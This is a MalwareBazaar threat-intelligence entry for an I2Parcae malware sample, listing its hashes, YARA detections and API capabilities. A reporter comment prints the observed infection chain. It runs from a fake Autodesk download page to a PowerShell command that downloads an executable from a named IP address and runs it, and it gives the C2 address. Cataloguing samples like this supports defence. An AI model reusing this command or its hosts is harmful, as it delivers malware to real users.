MalwareBazaar Database
You are currently viewing the MalwareBazaar entry for SHA256 7949f04cffb4daf9fa6c4774e2a9b18962c4f6157cd91f717e3089f49c9c754d. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.
Database Entry
I2Parcae
Vendor detections: 12
| SHA256 hash: | 7949f04cffb4daf9fa6c4774e2a9b18962c4f6157cd91f717e3089f49c9c754d |
|---|---|
| SHA3-384 hash: | a27997e9f6765207a5c5930f70feee8fe48bb17fb7c8fb9fd537e4779f6380668d3da34356833bdc5df0dca192994928 |
| SHA1 hash: | da86bea1b0de55fed13464a374e2f724ce38aee7 |
| MD5 hash: | 9b41d60958d07cdfd3cbc58fbb56cea7 |
| humanhash: | two-summer-missouri-asparagus |
| File name: | DF2.exe |
| Download: | download sample |
| Signature | I2Parcae |
| File size: | 8'630'784 bytes |
| First seen: | 2025-01-01 17:08:16 UTC |
| Last seen: | Never |
| File type: | |
| MIME type: | application/x-dosexec |
| imphash | 4b0c724426c4e106290c582a91355ce6 (1 x I2Parcae) |
| ssdeep | 49152:9msYIP7Jzvi24hQ7UId5z3dxexnUSF4kPoJ8PnMX8Qodtd5yE+ghxR9scTQdZnK6:hZAIcTaKNeIo |
| TLSH | T1D096293F62A5826DC25EC23EC0A3CF40D933B2761777C6E7629503A98F469C65E3E560 |
| TrID | 77.6% (.CPL) Windows Control Panel Item (generic) (57583/11/19) 14.1% (.EXE) Win64 Executable (generic) (10522/11/4) 2.7% (.EXE) OS/2 Executable (generic) (2029/13) 2.6% (.EXE) Generic Win/DOS Executable (2002/3) 2.6% (.EXE) DOS Executable Generic (2000/1) |
| Magika | pebin |
| File icon (PE): | |
| dhash icon | bcf0e4d4d4dcd4d4 (99 x Vidar, 9 x CastleRAT, 7 x I2Parcae) |
| Reporter | |
| Tags: | 154-216-20-100 45-200-148-158 exe I2Parcae |
iamaachum
https://pc-softs.com/AutoDesk3DSMax/ => cmd /c start /min powershell $path='c:\users\public\DF2.exe';iwr http://154.216.20.100/tod/pr.py -outfile $path; start-process $path; start-process 'https://cutt.ly/ReXXzC1p'; => http://154.216.20.100/tod/pr.pyC2: 45.200.148.158
Intelligence
File Origin
ESVendor Threat Intelligence
Result
Behaviour
Result
Signature
Behaviour
Result
Behaviour
Unpacked files
YARA Signatures
MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.
| Rule name: | Borland |
|---|---|
| Author: | malware-lu |
| Rule name: | cobalt_strike_tmp01925d3f |
|---|---|
| Author: | The DFIR Report |
| Description: | files - file ~tmp01925d3f.exe |
| Reference: | https://thedfirreport.com |
| Rule name: | crime_unidentified_118 |
|---|---|
| Author: | kevoreilly |
| Description: | Detects malware family unidentified_118 |
| Rule name: | crime_unidentified_118_packed |
|---|---|
| Author: | Rony (r0ny_123) |
| Description: | Detects packed samples of malware family unidentified_118 |
| Rule name: | DebuggerCheck__API |
|---|---|
| Reference: | https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara |
| Rule name: | golang_bin_JCorn_CSC846 |
|---|---|
| Author: | Justin Cornwell |
| Description: | CSC-846 Golang detection ruleset |
| Rule name: | golang_david_CSC846 |
|---|---|
| Author: | David |
| Description: | CSC-846 Golang |
| Rule name: | pe_detect_tls_callbacks |
|---|
| Rule name: | RansomPyShield_Antiransomware |
|---|---|
| Author: | XiAnzheng |
| Description: | Check for Suspicious String and Import combination that Ransomware mostly abuse(can create FP) |
| Rule name: | Sus_Obf_Enc_Spoof_Hide_PE |
|---|---|
| Author: | XiAnzheng |
| Description: | Check for Overlay, Obfuscating, Encrypting, Spoofing, Hiding, or Entropy Technique(can create FP) |
| Rule name: | XWorm_3_0_3_1_Detection |
|---|---|
| Author: | Archevod |
| Description: | Detects XWorm versions 3.0 and 3.1 |
File information
The table below shows additional information about this malware sample such as delivery method and external references.
Web download
BLint
The following table provides more information about this file using BLint. BLint is a Binary Linter to check the security properties, and capabilities in executables.
Findings
| ID | Title | Severity |
|---|---|---|
| CHECK_AUTHENTICODE | Missing Authenticode | high |
| CHECK_NX | Missing Non-Executable Memory Protection | critical |
| CHECK_PIE | Missing Position-Independent Executable (PIE) Protection | high |
Reviews
| ID | Capabilities | Evidence |
|---|---|---|
| COM_BASE_API | Can Download & Execute components | ole32.dll::CoCreateInstance |
| MULTIMEDIA_API | Can Play Multimedia | gdi32.dll::StretchDIBits |
| WIN32_PROCESS_API | Can Create Process and Threads | kernel32.dll::CloseHandle winhttp.dll::WinHttpCloseHandle kernel32.dll::CreateThread |
| WIN_BASE_API | Uses Win Base API | kernel32.dll::LoadLibraryExW kernel32.dll::LoadLibraryA kernel32.dll::LoadLibraryW kernel32.dll::GetSystemInfo kernel32.dll::GetStartupInfoW kernel32.dll::GetDiskFreeSpaceW |
| WIN_BASE_IO_API | Can Create Files | kernel32.dll::CreateFileW kernel32.dll::DeleteFileW kernel32.dll::GetWindowsDirectoryW kernel32.dll::GetFileAttributesW kernel32.dll::FindFirstFileW kernel32.dll::RemoveDirectoryW |
| WIN_HTTP_API | Uses HTTP services | winhttp.dll::WinHttpAddRequestHeaders winhttp.dll::WinHttpConnect winhttp.dll::WinHttpCrackUrl winhttp.dll::WinHttpOpenRequest winhttp.dll::WinHttpOpen winhttp.dll::WinHttpQueryAuthSchemes |
| WIN_REG_API | Can Manipulate Windows Registry | advapi32.dll::RegConnectRegistryW advapi32.dll::RegCreateKeyExW advapi32.dll::RegDeleteKeyW advapi32.dll::RegLoadKeyW advapi32.dll::RegOpenKeyExW advapi32.dll::RegQueryInfoKeyW |
| WIN_USER_API | Performs GUI Actions | user32.dll::ActivateKeyboardLayout user32.dll::CreateMenu user32.dll::EmptyClipboard user32.dll::FindWindowExW user32.dll::FindWindowW user32.dll::OpenClipboard |
Comments
Login required
You need to login to in order to write a comment. Login with your abuse.ch account.